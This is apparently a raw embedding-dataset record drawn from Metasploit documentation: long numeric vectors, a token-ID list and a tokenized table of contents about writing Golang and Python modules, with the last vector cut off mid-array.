0.20483626425266266, 0.16601848602294922, 0.6116683483123779, -0.8654317855834961, 0.0724361464381218, -0.37974604964256287, 0.09060996770858765, -0.27970048785209656, -0.25858423113822937, 0.5689416527748108, 0.40392211079597473, -0.5554535388946533, 0.5546508431434631, 0.45168355107307434, -0.620735228061676, 0.06751813739538193, 0.5088212490081787, -0.45604053139686584, 0.5572699308395386, 0.6812567710876465, -0.41245463490486145, -0.5765011310577393, -0.7052406668663025, 0.24633200466632843, -1.1281416416168213, -0.29355350136756897, -0.6900734901428223, -0.5883863568305969, -0.5066123604774475, 0.17358990013599396, 0.19059975445270538, -1.0119904279708862, -0.14739641547203064, -0.5425022840499878, -0.21083761751651764, -0.4065932333469391, -0.08760480582714081, -0.3615192174911499, -0.6492324471473694, -0.5061541199684143, 1.1705989837646484, -0.0028063440695405006, 0.06468281149864197, -0.0033412575721740723, 0.377073734998703, 0.3369213044643402, 0.6479920744895935, -0.9674439430236816, -0.1632622480392456, 0.5656227469444275, 0.11287576705217361, -0.2852836847305298, 0.051462966948747635, -0.7077220678329468, 0.3903549015522003, -0.186183899641037, 0.6910657286643982, -0.8576310873031616, 0.2947847545146942, -0.20560459792613983, 0.3494483530521393, 0.5108777284622192, -0.3921892046928406, -0.18471132218837738, -0.7700063586235046, 0.49431437253952026, -0.11581834405660629, -0.31861528754234314, 0.2889712452888489, -0.7906509637832642, -0.9465155005455017, -0.8479591608047485, 0.8123959302902222, 0.053659312427043915, -0.025842107832431793, 0.278239905834198, -0.2975367605686188, 0.42029711604118347, -0.7028638124465942, 0.052785951644182205, 1.68461275100708, 0.614221453666687, -0.008990222588181496, -0.9512687921524048, 0.6952039003372192, 0.6099912524223328, -0.3981589078903198, 0.12602607905864716, 0.8720404505729675, -0.12476964294910431, -0.38094407320022583, -0.3115943670272827, -0.019921524450182915, -0.5051152110099792, -0.4294976592063904, 1.72750985622406, -0.1384355127811432, 0.6970236301422119, -0.551144540309906, -1.1570942401885986, -0.7865648865699768, 0.5515986084938049, 1.0211762189865112, 0.14110878109931946, 0.5166824460029602, 0.13529503345489502, 0.054240964353084564, 0.937224268913269, -0.6676498651504517, 0.19112390279769897, -0.23409788310527802, 0.9235089421272278, -0.13055415451526642, -0.4109576642513275, 0.45433464646339417, 0.44841188192367554, -0.613623857498169, -0.9830575585365295, -0.5596277117729187, -0.10272768139839172, -0.1305018812417984, -0.5046938061714172, -0.2470124363899231, -0.12271532416343689, -0.8512879014015198, 0.588448703289032, 0.04135040566325188, 0.24366439878940582, 0.20110444724559784, -0.33826401829719543, 0.33858656883239746, -0.16763775050640106, 0.1014731377363205, 1.0328021049499512, -0.007828260771930218, 0.2861235439777374, -0.9021470546722412, -0.01748502254486084, -0.042083825916051865, 0.2905358672142029, 0.6332225799560547, 0.5222249627113342, 0.5580969452857971, 0.5233833193778992, -0.3158397674560547, 1.4053603410720825, -0.48549166321754456, -0.137887105345726, 0.24256253242492676, -0.7678372263908386, -0.9159736633300781, -0.6810858249664307, -0.26179996132850647, -1.1080403327941895, 0.8801196813583374, -0.035478685051202774, -0.14828211069107056, 0.35658949613571167, 0.2778901159763336, -0.38415804505348206, -0.9424744844436646, 0.11523192375898361, -1.3441781997680664, -0.5476000308990479, 0.34844911098480225, -0.2263670116662979, 0.27440181374549866, 0.09963161498308182, -0.05529019236564636, -0.04666083678603172, -0.9619494676589966, 0.304805189371109, -0.4317442774772644, 0.20228871703147888, -0.6248780488967896, 0.38624662160873413, -0.9514060020446777, -0.3881740868091583, -0.7641053199768066, -0.20850726962089539, 0.2219417542219162, -0.987977147102356, 0.5853192210197449, 0.0244157612323761, -0.10011711716651917, 0.7041747570037842, 0.0777704045176506, 0.11646394431591034, -0.17090295255184174, -0.5658187866210938, 1.0720574855804443, -0.33132630586624146, -0.41350841522216797, 0.30863890051841736, -0.2348996251821518, -0.9400392770767212, 0.24008022248744965, -0.5222073793411255, 0.5857298374176025, -0.017261043190956116, -0.23547928035259247, 0.5327528715133667, -0.1491721123456955, -0.47170600295066833, -0.40887558460235596, -0.1418433040380478, -1.0266380310058594, 0.4876001179218292, -0.7206323146820068, 0.12619110941886902, 0.40192079544067383, -0.5717349052429199, -0.07380858808755875, 0.42839059233665466, 0.10618679225444794, 0.12171730399131775, -0.3501970171928406, 0.9710077047348022, 0.24951040744781494, 0.41608598828315735, 0.41737887263298035, 0.2736772298812866, 0.4962030351161957, 0.6648475527763367, 0.413885235786438, 0.029883768409490585, 0.07539878040552139, 0.27950090169906616, 0.11832136660814285, -0.10614264011383057, -0.8795815706253052, -0.1178789809346199, -0.3223465383052826, 0.48373544216156006, -0.02463098242878914, -0.10283073782920837, -0.01225404441356659, 0.8764997720718384, 0.16293415427207947, 0.4117628335952759, -1.1730083227157593, -0.045543935149908066, 0.7976134419441223, -0.42999914288520813, 0.5922568440437317, -0.46135199069976807, -0.3144969344139099, -0.3767973780632019, 0.25601115822792053, -0.4529975652694702, 0.31233781576156616, 0.5405864119529724, -0.350788950920105, 0.3286556601524353, -0.2956397831439972, -0.14720681309700012, 0.009071330539882183, 0.6281660199165344, 0.14795246720314026, -0.4313834309577942, 0.08305265009403229, 0.9160054326057434, 0.030745988711714745, 0.3190743029117584, -0.030129659920930862, 0.03860790655016899, -0.39926305413246155, 0.054615043103694916, -0.2092333734035492, 0.23533162474632263, -0.2859243154525757, 0.9903071522712708, -0.23475199937820435, 0.622306227684021, -0.06526034325361252, 0.8491696119308472, 0.07486423850059509, -0.06523468345403671, -0.392530620098114, 0.020611587911844254, -0.055928777903318405, 0.6177729368209839, 0.3155907392501831, 0.8265467286109924, 0.15598109364509583, -0.208628311753273, -0.3313724100589752, -0.6188535690307617, 1.042301893234253, 0.9459198117256165, 0.026279699057340622, -0.11945449560880661, 0.8343871831893921, 0.24313175678253174, -1.0675524473190308, -0.25429391860961914, -0.034199059009552, -0.327484130859375, 0.2436896711587906, 0.400302529335022, -0.6421065926551819, -0.5275595188140869, 0.3113430142402649, -1.0105712413787842, 0.29933828115463257, -0.378572940826416, -0.26881837844848633, -0.8721003532409668, 0.39291924238204956, 0.32710835337638855, 0.09909693896770477, 0.19902144372463226, 0.6987373232841492, -0.11279288679361343, 1.1817315816879272, 0.7104624509811401, -0.23726463317871094, 0.260560542345047, 1.202497124671936, 0.5422749519348145, -0.34910139441490173, 0.2758811116218567, 0.5778434872627258, 0.6386350989341736, -0.7205076217651367, 0.22460953891277313, -0.2620055377483368, -0.005089364480227232, 0.33373740315437317, -0.3247857689857483, -0.5804741382598877, 0.411723792552948, 0.1564473807811737, 0.6072975993156433, 0.185763418674469, -0.7585374116897583, 0.4593505859375, -0.699191689491272, 0.8360770344734192, -0.3545612096786499, 0.05910854786634445, 0.5408253073692322, -0.9536139965057373, -0.2193777710199356, 0.3346795439720154, -0.07909703999757767, 0.37849971652030945, -0.016551392152905464, 1.2837886810302734, 0.19713090360164642, 0.6092574596405029, 0.5004581212997437, -0.18570458889007568, 0.1417263150215149, 0.6775918006896973, -0.5420283079147339, -0.013116943649947643, 0.15062367916107178, 0.11674530804157257, 0.20588219165802002, 0.011877181008458138, -0.6385264992713928, 0.5477127432823181, 0.2988448739051819, -0.08552426844835281, -0.4327782988548279, 0.23738574981689453, -0.18459409475326538, -0.5456016063690186, -0.06249803677201271, 0.8761577606201172, 0.3033854067325592, -0.08902747184038162, -0.28241583704948425, -0.39404991269111633, -0.38901787996292114, 0.46182137727737427, -1.3845103979110718, 0.1395988017320633, -0.7156888842582703, -0.1016184464097023, -0.4527322053909302, -0.5305393934249878, -0.3662363588809967, 0.15083904564380646, -0.4809299409389496, -0.582148015499115, 0.09526556730270386, 0.8990731835365295, 0.6971065998077393, 0.5526138544082642, 0.040701039135456085, 0.18188917636871338, 0.4291132390499115, 1.1771868467330933, -0.0544072650372982, 0.6162737607955933, -0.18947800993919373, 0.208404541015625, 0.18377409875392914, -0.621367335319519, -0.209979847073555, 0.034018851816654205, 0.5664119720458984, -0.7092645168304443, 0.16461925208568573, -0.37287282943725586, -1.1011552810668945, 0.22083894908428192, 0.7514752149581909, 0.44854453206062317, -0.8318052887916565, -0.6917567253112793, -0.5224080681800842, -1.1287219524383545, -0.7298896312713623, -0.9892446398735046, 0.5380986928939819, -0.1902705729007721, -0.252927303314209, 0.03839549049735069, -0.7820818424224854, 3.8238282203674316, 0.8265787959098816, -0.0014280545292422175, 0.3233276605606079, 0.5746803879737854, -0.384326308965683, 0.7922598719596863, -0.09665942192077637, -0.35818350315093994, -0.10456985980272293, 0.6961973905563354, -0.4372577369213104, 0.5071617960929871, 1.3086895942687988, 0.32479560375213623, 0.7300821542739868, -0.9670023918151855, -0.0843476951122284, 0.07346977293491364, -0.5350846648216248, -0.47121426463127136, -0.4701725244522095, 0.5040268898010254, 0.5408740043640137, 1.2993863821029663, 0.3658693730831146, 0.3332270383834839, -0.8474213480949402, 0.5257299542427063, -0.04439496248960495, 0.8686202168464661, -0.5230638980865479, 0.9994954466819763, -0.08206456899642944, -0.8322684168815613, 0.29741954803466797, -0.1181827262043953, -0.12694759666919708, -0.36116844415664673, -0.14261166751384735, -0.23685698211193085, -0.03956980258226395, 0.3074575662612915, -0.4976857006549835, -0.14277221262454987, 0.767326295375824, -0.7375957369804382, 0.4689854085445404, 0.8823913335800171, -0.4278453290462494, 0.29437315464019775, -0.34131529927253723, 0.20318636298179626, -1.2176636457443237, -0.9262480139732361, 0.4653874337673187, 0.2998189330101013, 0.263362854719162, 0.07301733642816544, -0.14388327300548553, -0.10264125466346741, 0.9640399813652039, -0.5344613790512085, 0.12497710436582565, -0.2892439365386963, 0.975080132484436, 0.40373051166534424, 0.5533560514450073, 0.08233868330717087, -0.5444875955581665, -0.339169442653656, -0.5267691016197205, -0.7276341915130615, -0.6332866549491882, 0.6358740329742432, 0.3277604877948761, -0.15859270095825195, 0.5337809324264526, 0.2190037965774536, -0.28954946994781494, -0.23943307995796204, 0.6523585319519043, -1.0528180599212646, 0.012827515602111816, 0.25656622648239136, 0.6911653876304626, -0.6588419079780579, -0.016923408955335617, -0.30079948902130127, 0.5045206546783447, 0.9247074127197266, 0.4979584515094757, 0.11856207251548767, 0.11277016252279282, 0.03484445810317993 ]
[ 1013, 2742, 1012, 4012, 1013, 9927, 1012, 25718, 1029, 8909, 1027, 13138, 1005, 1033, 1033, 1010, 1005, 4132, 1005, 1027, 1028, 1005, 2663, 1005, 1010, 1005, 7889, 1005, 1027, 1028, 1031, 1031, 1005, 2742, 1005, 1010, 1063, 1005, 2128, 2102, 1005, 1027, 1028, 1014, 2595, 23632, 23632, 23632, 23632, 1065, 1033, 1033, 1010, 1005, 18093, 1005, 1027, 1028, 1063, 1005, 2919, 7507, 2869, 1005, 1027, 1028, 1000, 1032, 1060, 8889, 1000, 1065, 1010, 1005, 21598, 1005, 1027, 1028, 6270, 1010, 1005, 19380, 13701, 1005, 1027, 1028, 1005, 2297, 1011, 5840, 1011, 5890, 1005, 1010, 1005, 12398, 7559, 18150, 1005, 1027, 1028, 1014, 1010, 1005, 3964, 1005, 1027, 1028, 1063, 1005, 9875, 1005, 1027, 1028, 1031, 1005, 10986, 6806, 3600, 1005, 1033, 1065, 1007, 1007, 2203, 13366, 18077, 6140, 1035, 2139, 8569, 2290, 1006, 1005, 7592, 1010, 2088, 1005, 1007, 2203, 2203, 102 ]
metasploit
117.txt
1
[CLS] table of contents overview writing golang modules writing python modulesback to top [SEP]
[ 0.3445327877998352, -0.6647922396659851, -0.06453447788953781, -0.5937643647193909, -0.6359357833862305, -0.4007449448108673, 0.04330912604928017, 0.4927835166454315, -0.030339475721120834, 0.7157053351402283, -0.6982377767562866, 0.25272589921951294, 0.332188218832016, -0.15663471817970276, -0.028016330674290657, 0.2310316264629364, -0.5004942417144775, -0.28544750809669495, -1.3589156866073608, 0.5956400632858276, 0.31882476806640625, -0.2757388949394226, -0.7281796336174011, -0.5818578004837036, -0.6693028807640076, 0.49263229966163635, 0.2678639888763428, 0.07893618196249008, 1.80854070186615, 1.0091103315353394, 0.47478964924812317, 0.6245652437210083, -0.28519177436828613, -1.3434462547302246, 0.1743829995393753, -1.0088971853256226, 0.5043602585792542, -0.10513042658567429, -0.34677544236183167, -0.3935844898223877, 0.42153212428092957, -0.5161012411117554, 0.7941384315490723, -0.6094750761985779, -1.2141458988189697, 0.16656717658042908, 0.3403451144695282, 0.23560914397239685, -0.02017327770590782, -0.37084218859672546, -0.20790217816829681, 1.0259536504745483, -0.059742674231529236, 0.16936354339122772, -1.1785926818847656, 0.8299976587295532, -0.2680929899215698, -0.12647561728954315, -0.3839281499385834, 0.8180508613586426, 0.5793324112892151, 1.0115529298782349, 0.562777042388916, -0.8969990611076355, 0.2550763189792633, 0.5067471861839294, 0.44795387983322144, 0.0881359726190567, 0.13240863382816315, -0.4044792950153351, -0.6048815846443176, 0.01902247965335846, -0.4597434401512146, -0.9695760607719421, -0.7834539413452148, 0.1882634311914444, 0.9538289904594421, -0.12598413228988647, 0.6716508865356445, 0.9107768535614014, 0.05008440837264061, 0.9095622897148132, -0.39406201243400574, 0.18829771876335144, -0.6917415261268616, -0.23038654029369354, -0.4256093204021454, -0.11247995495796204, -0.6120020151138306, 0.16407257318496704, -0.19706323742866516, 1.0084457397460938, -0.039291247725486755, -0.26572442054748535, -0.004069895949214697, 0.5617450475692749, -0.4051743745803833, 0.13907045125961304, -0.773332417011261, -0.3199229836463928, 0.6100993156433105, 1.192145824432373, 0.2012561708688736, 0.40852034091949463, -0.461029052734375, -0.28649064898490906, 0.4906609356403351, 0.24088621139526367, -0.14734232425689697, -0.4148942232131958, -0.612490713596344, 0.08660983294248581, -0.5656856298446655, -0.458903968334198, -0.18323054909706116, 0.6365552544593811, -0.10237725079059601, -0.2217743992805481, -0.48414191603660583, 0.42835232615470886, 0.27231431007385254, -0.580133855342865, 0.6811498999595642, -0.32317599654197693, -0.2980915904045105, 0.040825143456459045, -0.6692026257514954, 1.0489754676818848, -0.8846920728683472, 0.005241965875029564, -0.6181964874267578, -0.27056217193603516, 0.4063906967639923, 0.44226983189582825, -0.000846940849442035, 0.21075809001922607, -0.7318010926246643, -0.07117097079753876, 0.3043712377548218, -1.0142532587051392, 0.3181186616420746, -0.7961979508399963, 0.19864465296268463, 1.2658034563064575, -0.4148397445678711, 0.5090591311454773, -0.5045586228370667, -0.5261607766151428, -0.35677698254585266, 0.4496607780456543, -0.13702191412448883, -0.6534428596496582, 0.7133191823959351, 0.15166980028152466, -0.23120111227035522, -0.561460018157959, -0.2969501316547394, 0.19263975322246552, 0.8565289974212646, -0.24199733138084412, -0.16712181270122528, -0.025330543518066406, -0.1357363611459732, 0.5407388806343079, -0.48549169301986694, 0.9374375343322754, -0.7535237073898315, -0.7987751960754395, -0.6057355999946594, -0.3226481080055237, -0.1694934219121933, 0.0758366659283638, -0.1705634593963623, -0.13907010853290558, 0.5902451276779175, 1.289756178855896, 0.30666229128837585, 0.4062291979789734, 0.39002159237861633, 1.2200766801834106, -0.021191086620092392, 0.5632036328315735, 0.6000290513038635, 0.7237299680709839, 0.12575531005859375, 0.6347995400428772, 0.7825462222099304, 0.018035156652331352, -0.15448947250843048, -0.3658659756183624, -0.6180949211120605, 0.9965089559555054, 0.11465445160865784, 0.28941264748573303, -0.9249168634414673, -0.4741615951061249, -0.29057201743125916, 0.9727647304534912, -0.8310550451278687, -0.6607995629310608, -0.5986676216125488, 0.15918400883674622, -0.3085530996322632, 0.1412646621465683, 0.3170662820339203, -0.37512484192848206, 0.14142519235610962, 0.8838574290275574, -0.8287007212638855, -0.13619466125965118, 0.7928372621536255, -0.345938116312027, -0.6267628073692322, -0.01261060032993555, 0.2715007960796356, -0.7627915740013123, -0.5110051035881042, -0.06539299339056015, -0.12469475716352463, -0.2248295694589615, 0.3788086473941803, 0.35883405804634094, 0.611562967300415, -0.4105660617351532, -0.37872403860092163, 0.47148409485816956, 0.2718721628189087, 0.8194139003753662, 0.05978398770093918, 0.2266632318496704, -0.08625652641057968, -0.4847273528575897, -0.008498802781105042, 0.7575936317443848, 0.6295568943023682, -0.5335126519203186, 0.9809065461158752, 0.25554436445236206, -0.20364950597286224, 0.032050687819719315, 0.31317201256752014, 0.033776961266994476, -0.21759968996047974, 0.1464463174343109, 0.143218532204628, 0.3272969126701355, -0.4155687391757965, -0.30384117364883423, -0.8738940954208374, 0.30302879214286804, -1.0211514234542847, 0.9167248010635376, 0.08825903385877609, -0.5694043040275574, 0.05845386162400246, -0.7067785263061523, 0.5640475749969482, 0.6247729659080505, -0.9985964298248291, 0.31397661566734314, 0.808586597442627, 0.18129009008407593, -0.3397652804851532, 0.2041311413049698, 0.31140875816345215, 0.6809960603713989, -0.2818554639816284, -0.20992319285869598, 0.27760517597198486, -1.0716779232025146, -0.37592068314552307, -0.0205315463244915, -0.8376886248588562, 0.26658281683921814, -1.2879949808120728, 0.5445957779884338, 1.0367356538772583, -0.278255432844162, -0.9464632272720337, -0.16738243401050568, 0.5649875998497009, 0.404675155878067, 0.638405442237854, 0.32803547382354736, 0.3732748031616211, -0.4021812081336975, -0.8058122396469116, -0.2012193351984024, -1.2617712020874023, 0.5358105897903442, -1.0660330057144165, 0.7092776894569397, -0.07945181429386139, 0.053722236305475235, 0.2033223956823349, 0.9547035098075867, -0.23594917356967926, 0.31430062651634216, -0.6766901016235352, 0.04037802666425705, -1.228697419166565, -0.3448435664176941, 0.6241083741188049, -0.3769652247428894, 0.04663015902042389, 0.9761043787002563, -0.0953892171382904, -0.913849413394928, 0.8212763071060181, 0.34858864545822144, 0.05843494459986687, 0.990964412689209, -0.2768366038799286, -0.09630152583122253, -1.1717547178268433, 1.0731773376464844, 0.3898594379425049, -0.10793045908212662, 0.27137884497642517, -0.8417719006538391, -0.7300179600715637, -0.21510373055934906, 1.0025092363357544, -0.6876626014709473, 0.17806020379066467, 0.9831466674804688, 0.0017017337959259748, -1.1983212232589722, 0.7915812730789185, -0.24958448112010956, -0.5272994041442871, -0.5753518342971802, -0.10004042088985443, 0.4823991656303406, 0.4936794936656952, 0.697888970375061, -1.0303840637207031, -0.03203339874744415, -0.5213267207145691, -0.26014429330825806, -0.28598567843437195, -0.25949713587760925, 0.637087345123291, 0.3055731952190399, -0.03161562234163284, 1.0812573432922363, 0.7303998470306396, -0.25667721033096313, -0.043155327439308167, 0.22247961163520813, 0.07741595059633255, 0.22744129598140717, 0.6399937272071838, 0.5989911556243896, 0.015501527115702629, 0.349226176738739, -0.1881161481142044, 0.4622684121131897, -0.0746358186006546, 0.28811830282211304, 0.13344910740852356, 0.9625137448310852, -0.15861493349075317, -0.4343278110027313, -1.2593082189559937, -0.3569171726703644, -0.452175498008728, 0.860980212688446, 0.4125283360481262, 0.020074576139450073, 1.1248501539230347, 0.2999669015407562, -0.1121491864323616, -0.2699885964393616, -0.6590911149978638, -0.15760435163974762, 0.13464562594890594, 0.48291948437690735, 0.9675076603889465, 0.04942290112376213, -0.7082772254943848, -0.5681428909301758, -0.2689683437347412, 0.25050702691078186, 0.1318340003490448, -0.21912793815135956, -0.10314033180475235, 0.2587008774280548, -0.4652942717075348, -0.1171984001994133, -0.02471882291138172, -0.41719889640808105, 0.08012758940458298, -0.5893651247024536, -0.7251412272453308, -0.6814283132553101, 0.44253966212272644, 1.128786325454712, 0.9472408294677734, 0.05766283720731735, -0.11287061870098114, -0.32539838552474976, 0.1892753392457962, 0.05073505640029907, -0.20463836193084717, -0.46604228019714355, -0.24331484735012054, 0.24269999563694, -0.1508907824754715, 0.5808935761451721, -0.530286431312561, -0.12626832723617554, 0.10010839998722076, 1.4150348901748657, 0.058004241436719894, 0.4105871021747589, -0.4480995833873749, 0.2757710814476013, 0.9328932762145996, -0.06969424337148666, 0.015265371650457382, -0.21586139500141144, 0.4527004361152649, 0.2406037598848343, 0.4291056990623474, -0.22057823836803436, 0.17534524202346802, 0.17487354576587677, -0.5301071405410767, 0.567444384098053, -0.1126088798046112, -1.3916356563568115, -0.07915641367435455, -0.13871406018733978, -0.823360800743103, 0.8840181827545166, 0.7200961709022522, -0.42812997102737427, 0.7935632467269897, -0.6835966110229492, 0.2575136125087738, -0.12849882245063782, -0.025086380541324615, 0.11248291283845901, -0.31544989347457886, -0.652142345905304, 0.05321166664361954, 0.6217230558395386, 0.0459122434258461, -0.3605864942073822, 0.8595408797264099, -1.1917508840560913, 0.7675020694732666, -0.6393894553184509, 0.16460220515727997, -0.4810127913951874, -0.2320697158575058, 0.569251298904419, 0.09529992192983627, -0.24112223088741302, 0.031237566843628883, -0.11916447430849075, 0.6778079867362976, -0.22510603070259094, -0.4232659637928009, 0.9213474988937378, -0.6289139986038208, 0.020977532491087914, 0.6686779856681824, 0.48852628469467163, -0.4998670816421509, -0.25923261046409607, 0.1905345767736435, -0.24073879420757294, 0.006534102372825146, -0.874815046787262, 0.026116184890270233, -0.20972305536270142, -0.4767800569534302, -0.1489391326904297, -0.48640719056129456, 0.6746273040771484, 0.8152005672454834, -0.6050888895988464, 0.26033011078834534, -1.223950982093811, -0.6179811358451843, 0.928309977054596, -0.09893912076950073, 0.3029177188873291, -0.028797363862395287, -0.4487822651863098, 0.21423904597759247, -0.6721940040588379, 0.034456752240657806, -1.533551573753357, -0.24471871554851532, -0.3349578082561493, 0.3843153119087219, 0.9693251848220825, 0.40424010157585144, -0.04956809803843498, -1.4574058055877686, -0.030177883803844452, 0.3677862286567688, -0.3979581594467163, -0.6605034470558167, -0.27066320180892944, 0.5992959141731262, 0.11039929836988449, -0.23881101608276367, 0.008054215461015701, -0.6474328637123108, -0.29600220918655396, -0.10955493152141571, 0.05433384329080582, 0.6112083792686462, 0.4916383624076843, -0.5014098882675171, 0.26360562443733215, 0.5892766714096069, -0.6817619204521179, 0.004952450282871723, 0.08907157927751541, -0.719629168510437, 0.073356993496418, -0.3636583089828491, -0.6625840067863464, -0.12662863731384277, -0.7845177054405212, 0.1451030820608139, -0.58034747838974, -0.012990841642022133, -0.8892682790756226, -0.12422415614128113, -0.2661580443382263, -0.28469863533973694, 0.8546226620674133, -1.1995899677276611, 0.2742358446121216, -0.2788902223110199, 0.756859302520752, -0.5172410011291504, -0.06496927887201309, -0.10640862584114075, -1.2099127769470215, -0.010981830768287182, 1.6958715915679932, 0.02748654969036579, 0.43377095460891724, -0.3798306882381439, 0.2668255567550659, -0.07340015470981598, 0.3394118547439575, -1.3011901378631592, 0.15927748382091522, 0.28692471981048584, -0.33125895261764526, 0.4715985059738159, 0.22035790979862213, -0.1611349880695343, 0.9710583090782166, -0.6519365310668945, 0.686619222164154, 0.263509601354599, 0.1938849836587906, -0.7691426277160645, 0.4154726564884186, 0.505603015422821, -0.342658132314682, 0.34888267517089844, -0.6528517007827759, 0.8486407399177551, -0.17314240336418152, -0.7127171158790588, -0.2053000032901764, -0.6061534285545349, -1.0960335731506348, -0.5547896027565002, 0.8691432476043701, -0.8433713316917419, 0.24493801593780518, 0.4249286651611328, 0.45248106122016907, 0.44734427332878113, -0.2284107506275177, 1.0024585723876953, 1.3112187385559082, 1.1231300830841064, -0.3231266736984253, -1.009161114692688, 0.21804063022136688, 0.4695833921432495, -0.5629372596740723, 0.5093873739242554, 0.15644888579845428, -0.6503067016601562, 0.5617606043815613, -0.3445552587509155, -0.14317110180854797, -0.669720470905304, 0.272098571062088, 1.079048991203308, 0.32422780990600586, 0.05190696939826012, 0.508376955986023, -0.9870559573173523, -0.2095356434583664, 0.6879159808158875, -0.00961058959364891, 0.46668973565101624, 0.5035966038703918, -0.014392240904271603, 0.7151501774787903, -0.04585983604192734, -0.7986262440681458, 0.10143370926380157, 0.3352016806602478, 0.7967888116836548, -0.22824397683143616, -0.44162482023239136, 0.4437846839427948, 1.0187714099884033, -0.9779941439628601, -1.2584022283554077, -0.8700081706047058, -0.4856812059879303, 0.6239509582519531, -0.6639568209648132, -0.9333420395851135, 1.422047734260559, 0.0006228169659152627, 0.8521835803985596, 0.42379456758499146, -0.4706580638885498, 0.19003210961818695, -0.09710074216127396, -0.2696388363838196, -0.6271148324012756, 0.7138711810112, -0.005579804070293903, 0.03058036044239998, -0.4450424909591675, -0.20451191067695618, 0.15318207442760468, -0.7727777361869812, -0.5075686573982239, 0.9989392161369324, -0.20439332723617554, 0.22674380242824554, -0.366183340549469, 0.6987650394439697, 0.0657031387090683, -0.027494080364704132, -0.05693841725587845, 0.12135758996009827, -1.429098129272461, -0.4753916561603546, -0.4476161301136017, -0.36138027906417847, 0.34820356965065, 0.3794606029987335, 0.33279553055763245, -0.04028697311878204, 1.1591403484344482, -0.1992478370666504, 0.21098312735557556, -1.8049263954162598, 0.3452185094356537, -0.6025705933570862, -0.1585630476474762, -0.5298904180526733, -0.9752245545387268, 0.4078705608844757, -0.7818831205368042, 0.07385089248418808, -0.4186182916164398, -0.9462643265724182, 0.17559126019477844, -0.07188896834850311, -0.2619125545024872, -0.13479211926460266, 0.8797646164894104, -1.0227209329605103, -0.36890116333961487, -0.7901010513305664, 0.3291616141796112, -0.2638586759567261, 0.09850352257490158, -0.3366796374320984, 0.19760575890541077, 0.020505208522081375, 0.752469539642334, -0.05645608901977539, -0.6075161099433899, -0.595151960849762, -1.0026649236679077, 0.2379315346479416, 0.04309295862913132, -0.5477373600006104, 0.5937517285346985, 0.44711264967918396, -0.37215471267700195, -0.061711497604846954, 0.3240775763988495, -0.3908039927482605, -0.45144808292388916, 0.009239054284989834, -0.19606813788414001, -0.00738811120390892, -0.07327710837125778, 0.5249558091163635, -0.03086211532354355, 0.12894338369369507, 0.0835212916135788, -0.3502587080001831, -0.32181602716445923, 1.0619431734085083, -0.31052955985069275, 0.3037258982658386, 0.45987772941589355, 0.23294787108898163, -0.12092304974794388, 0.30422013998031616, 0.7018671035766602, 0.6595437526702881, 0.3726877272129059, -0.5237480998039246, 0.6815661191940308, -0.22332394123077393, 0.13472570478916168, 0.8508951663970947, 0.6547296047210693, 0.1217246875166893, 1.073800802230835, -0.17892558872699738, 0.2566567659378052, 0.24367466568946838, -0.008011199533939362, 0.1701722890138626, 0.4828800559043884, 0.559823215007782, -0.44924330711364746, -0.3012745976448059, -0.6356271505355835, -0.02487790957093239, 0.16011853516101837, -0.20546837151050568, 0.2842201590538025, 0.2608601450920105, -1.086931824684143, 0.7180948853492737, -0.8945798277854919, -0.5762873888015747, 0.3053930997848511, 0.3830257058143616, 0.7077699899673462, -0.2970440983772278, -0.22031570971012115, 0.6494632363319397, 0.18252311646938324, -1.467869520187378, 0.24509620666503906, 0.4376470744609833, -0.36010268330574036, -0.03239959478378296, -0.565282940864563, 0.19934868812561035, 0.9718179702758789, -0.2706400156021118, -0.25137531757354736, -0.3352426588535309, -0.5444898009300232, -0.12131763994693756, 0.7128798961639404, -0.2524012327194214, -0.22995120286941528, -0.07512882351875305, 0.02056407369673252, -0.3845348358154297, 0.5395668745040894, -1.5465164184570312, 0.47041749954223633, 0.27296188473701477, -0.05645067244768143, -0.155354306101799, 0.6742920279502869, -0.36879247426986694, 0.5581808686256409, 0.49673405289649963, 0.27024567127227783, 0.18860511481761932, -0.23556384444236755, -0.5952070355415344, 0.7209094762802124, 0.15192602574825287, -0.04716341942548752, 0.40309226512908936, -0.38150638341903687, 0.5589330792427063, -0.19571049511432648, -0.3637874126434326, -0.21394027769565582, 0.37786102294921875, -0.07673192024230957, -0.8244755864143372, 0.6642640233039856, -0.544921875, -0.40310990810394287, -0.320284366607666, -0.4272591173648834, 0.35674524307250977, -0.5519829392433167, 0.3009016215801239, -0.668125331401825, -0.23027487099170685, 0.7047927379608154, -0.04058203101158142, -0.709500253200531, -0.06938917189836502, -0.16515745222568512, 0.948076605796814, 0.25909730792045593, 0.05301065370440483, 0.9053193926811218, 0.1278441995382309, 0.4212420880794525, 0.18186579644680023, 0.38822421431541443, 0.5301603078842163, 0.2993999123573303, -0.2179061770439148, -0.15829959511756897, -0.683734655380249, 0.7339889407157898, -0.006903309840708971, -0.2136363834142685, -1.4278686046600342, -0.019386734813451767, -0.49226078391075134, 0.19228626787662506, 0.3418286442756653, -0.2101816087961197, -0.32067257165908813, -0.9231137633323669, 0.5644593238830566, -0.3839169144630432, 0.22955459356307983, 0.9225700497627258, 0.09590194374322891, -0.5191147923469543, -0.008247135207057, 0.5386002659797668, 0.3921559154987335, 0.4965626001358032, 1.1973003149032593, -0.09409397840499878, 0.7892367839813232, 1.184859037399292, -0.2575056850910187, 0.3468776345252991, -0.5203166604042053, -0.28951671719551086, 0.043867554515600204, 0.14242510497570038, -0.3241995573043823, 0.17701976001262665, -0.0481722429394722, -0.4540019631385803, 0.40339961647987366, 0.2860593795776367, 0.003899004077538848, -0.15429438650608063, 0.4984787702560425, 0.529584527015686, -0.34213346242904663, 0.30727705359458923, 1.3069401979446411, 0.04162771999835968, -0.06372718513011932, 0.2778354287147522, 0.14967083930969238, -0.4244428873062134, 0.39466795325279236, -0.7502869963645935, 0.5379801392555237, -0.4022202491760254, -0.13586954772472382, 0.17547529935836792, -1.222326636314392, 0.09865127503871918, -0.2355441451072693, -0.6095886826515198, -0.6656367778778076, -0.05209578573703766, 0.09621153771877289, 1.197479486465454, -0.23431795835494995, -0.7766872644424438, 0.363554447889328, 0.44646260142326355, 1.2840336561203003, 0.445715069770813, 1.1890439987182617, 0.49165764451026917, -0.12004067003726959, 0.09031923115253448, -0.37130579352378845, 1.0454888343811035, -0.46882137656211853, -0.5180990099906921, 0.6115424633026123, 0.4769652187824249, 0.0789850577712059, -1.3802776336669922, -0.546435534954071, 0.5464497804641724, -0.002916220109909773, 0.10650503635406494, -0.4012518525123596, -0.0580858513712883, -1.5464699268341064, -0.2020350992679596, -0.6404533982276917, -0.20508813858032227, -0.7491723895072937, -0.021052300930023193, -0.8400111198425293, -1.0592719316482544, 3.615358829498291, 1.0910395383834839, 0.1436127871274948, 